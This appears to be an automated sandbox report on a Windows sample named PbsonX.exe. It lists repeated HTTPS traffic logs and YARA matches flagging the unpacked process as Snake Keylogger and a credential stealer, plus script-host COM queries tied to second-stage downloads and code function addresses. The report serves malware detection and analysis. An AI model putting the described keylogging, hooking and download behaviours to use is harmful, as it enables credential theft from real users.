Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49959 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50146 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 2_2_025E0D30 2_2_025E0D30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4C19A 3_2_00E4C19A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E47118 3_2_00E47118
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4D278 3_2_00E4D278
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E45362 3_2_00E45362
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4C468 3_2_00E4C468
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4C738 3_2_00E4C738
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E469A0 3_2_00E469A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4E988 3_2_00E4E988
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4CA08 3_2_00E4CA08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4CCD8 3_2_00E4CCD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E49DE0 3_2_00E49DE0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E43E09 3_2_00E43E09
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4CFAA 3_2_00E4CFAA
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E429EC 3_2_00E429EC
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4F961 3_2_00E4F961
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E4E97A 3_2_00E4E97A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_00E43AA1 3_2_00E43AA1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05799548 3_2_05799548
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05799C70 3_2_05799C70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579FC68 3_2_0579FC68
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579E6B0 3_2_0579E6B0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05795028 3_2_05795028
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579D550 3_2_0579D550
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579D540 3_2_0579D540
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579DDF1 3_2_0579DDF1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579CCA0 3_2_0579CCA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579CC8F 3_2_0579CC8F
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579EF60 3_2_0579EF60
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579EF51 3_2_0579EF51
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_057917A0 3_2_057917A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579178F 3_2_0579178F
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05791E70 3_2_05791E70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579DE00 3_2_0579DE00
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579E6AF 3_2_0579E6AF
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05791E80 3_2_05791E80
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05792968 3_2_05792968
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579295B 3_2_0579295B
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579D9A8 3_2_0579D9A8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579D999 3_2_0579D999
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05790040 3_2_05790040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05790037 3_2_05790037
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05795018 3_2_05795018
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579F810 3_2_0579F810
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579F803 3_2_0579F803
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579D0F8 3_2_0579D0F8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05790B30 3_2_05790B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05799328 3_2_05799328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05790B20 3_2_05790B20
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579EB08 3_2_0579EB08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05799BF7 3_2_05799BF7
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579F3B8 3_2_0579F3B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579F3A8 3_2_0579F3A8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05798BA0 3_2_05798BA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_05798B91 3_2_05798B91
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579E258 3_2_0579E258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579E24B 3_2_0579E24B
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 3_2_0579EAF8 3_2_0579EAF8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_00887288 5_2_00887288
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_00885208 5_2_00885208
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_008843D0 5_2_008843D0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_00886450 5_2_00886450
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_00880D32 5_2_00880D32
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_0088727C 5_2_0088727C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 5_2_0088644A 5_2_0088644A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F15362 6_2_02F15362
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1A088 6_2_02F1A088
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1C147 6_2_02F1C147
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F17118 6_2_02F17118
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1C738 6_2_02F1C738
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1C468 6_2_02F1C468
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1D599 6_2_02F1D599
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1CA08 6_2_02F1CA08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F169A0 6_2_02F169A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1CFAA 6_2_02F1CFAA
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1CCD8 6_2_02F1CCD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1FC4A 6_2_02F1FC4A
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1EC18 6_2_02F1EC18
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F1F7F0 6_2_02F1F7F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F129E0 6_2_02F129E0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 6_2_02F13E09 6_2_02F13E09
